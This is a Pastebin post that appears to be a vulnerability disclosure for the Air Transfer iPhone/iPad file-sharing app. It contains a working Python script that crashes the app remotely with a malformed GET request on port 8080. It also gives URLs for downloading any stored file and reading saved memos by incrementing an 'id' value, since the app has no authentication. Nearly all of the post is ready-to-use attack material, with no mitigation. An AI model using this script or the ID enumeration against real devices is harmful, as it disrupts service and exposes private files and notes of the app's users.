Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- --------------------------------------------------------
- Product & Service Details:
- ==========================
- Air Transfer - Easy file sharing between PC and iPhone/iPad, File Manager with Document Viewer, Video Player, Music Player and Web Browser.
- Features include:
- -----------------
- * The easiest way to transfer files between PC and iPhone/iPad !
- * Just Drag & Drop your contents and Play: Text, Bookmark, Image and Photo, Music, Movie, Documents and more through wireless connection !
- Vulnerability details
- =========================
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- 1. Remote Application Crashing
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- #!/usr/bin/python
- import socket
- import sys
- s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
- host=raw_input("Enter IP : ")
- port=8080
- def connect():
- try:
- s.connect((str(host),port))
- except socket.error:
- print "Error: couldn't connect"
- sys.exit()
- return "connected to target"
- #Crashing the App
- def crashing():
- req="GET /getList?category=categoryAll?pageNo=1&key= HTTP/1.1\r\n\r\n"
- try:
- s.sendall(req)
- except:
- print "Error occured, Couldn't crash App"
- sys.exit()
- return "Application Down, Conection closed"
- print connect()
- print crashing()
- ______________________________________________________________________________________________________________________________
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- 2. Broken Authentication - Memo access & File download.
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
- To download any file simply visit:
- http://<IP>:8080/?downloadSingle?id=1
- Just by incrementing the value of "id" we can download all the files.
- TO view saved memos visit the below link:
- http://<IP>:8080/getText?id=0
- We can look for all the memos by incrementing the value of "id"
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
